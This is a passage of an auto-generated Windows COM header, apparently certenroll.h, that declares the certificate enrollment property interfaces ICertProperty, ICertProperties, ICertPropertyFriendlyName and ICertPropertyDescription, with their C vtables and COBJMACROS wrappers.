        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_PropertyId( 
            /* [in] */ CERTENROLL_PROPERTYID Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetValueOnCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertProperty * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertProperty * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertProperty * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertProperty * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertProperty * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertProperty * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertProperty * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertProperty * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertProperty * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertProperty * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertProperty * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        END_INTERFACE
    } ICertPropertyVtbl;

    interface ICertProperty
    {
        CONST_VTBL struct ICertPropertyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertProperty_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertProperty_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertProperty_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertProperty_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertProperty_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertProperty_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertProperty_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertProperty_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertProperty_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertProperty_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertProperty_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertProperty_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertProperty_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertProperty_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertProperty_INTERFACE_DEFINED__ */


#ifndef __ICertProperties_INTERFACE_DEFINED__
#define __ICertProperties_INTERFACE_DEFINED__

/* interface ICertProperties */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertProperties;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32f-217d-11da-b2a4-000e7bbb2b09")
    ICertProperties : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertProperty **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertProperty *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertProperties * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertProperties * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertProperties * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertProperties * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertProperties * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertProperties * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertProperty **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertProperties * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertProperties * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in_opt ICertProperty *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertProperties * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertProperties * This);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertProperties * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        END_INTERFACE
    } ICertPropertiesVtbl;

    interface ICertProperties
    {
        CONST_VTBL struct ICertPropertiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertProperties_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertProperties_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertProperties_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertProperties_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertProperties_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertProperties_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertProperties_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertProperties_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertProperties_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertProperties_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertProperties_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertProperties_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertProperties_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICertProperties_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertProperties_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyFriendlyName_INTERFACE_DEFINED__
#define __ICertPropertyFriendlyName_INTERFACE_DEFINED__

/* interface ICertPropertyFriendlyName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyFriendlyName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab330-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyFriendlyName : public ICertProperty
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strFriendlyName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyFriendlyNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyFriendlyName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyFriendlyName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyFriendlyName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in BSTR strFriendlyName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyFriendlyNameVtbl;

    interface ICertPropertyFriendlyName
    {
        CONST_VTBL struct ICertPropertyFriendlyNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyFriendlyName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyFriendlyName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyFriendlyName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyFriendlyName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyFriendlyName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyFriendlyName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyFriendlyName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyFriendlyName_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyFriendlyName_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyFriendlyName_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyFriendlyName_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyFriendlyName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyFriendlyName_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyFriendlyName_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyFriendlyName_Initialize(This,strFriendlyName)	\
    ( (This)->lpVtbl -> Initialize(This,strFriendlyName) ) 

#define ICertPropertyFriendlyName_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyFriendlyName_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyDescription_INTERFACE_DEFINED__
#define __ICertPropertyDescription_INTERFACE_DEFINED__

/* interface ICertPropertyDescription */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyDescription;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab331-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyDescription : public ICertProperty
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strDescription) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Description( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyDescriptionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyDescription * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyDescription * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyDescription * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyDescription * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyDescription * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in BSTR strDescription);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in ICertPropertyDescription * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyDescriptionVtbl;

    interface ICertPropertyDescription
    {
        CONST_VTBL struct ICertPropertyDescriptionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyDescription_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyDescription_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyDescription_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyDescription_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyDescription_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyDescription_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyDescription_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyDescription_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyDescription_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyDescription_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyDescription_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyDescription_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyDescription_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyDescription_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyDescription_Initialize(This,strDescription)	\
    ( (This)->lpVtbl -> Initialize(This,strDescription) ) 

#define ICertPropertyDescription_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyDescription_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyAutoEnroll_INTERFACE_DEFINED__
#define __ICertPropertyAutoEnroll_INTERFACE_DEFINED__

/* interface ICertPropertyAutoEnroll */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyAutoEnroll;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab332-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyAutoEnroll : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyAutoEnrollVtbl
    {
        BEGIN_INTERFACE
        
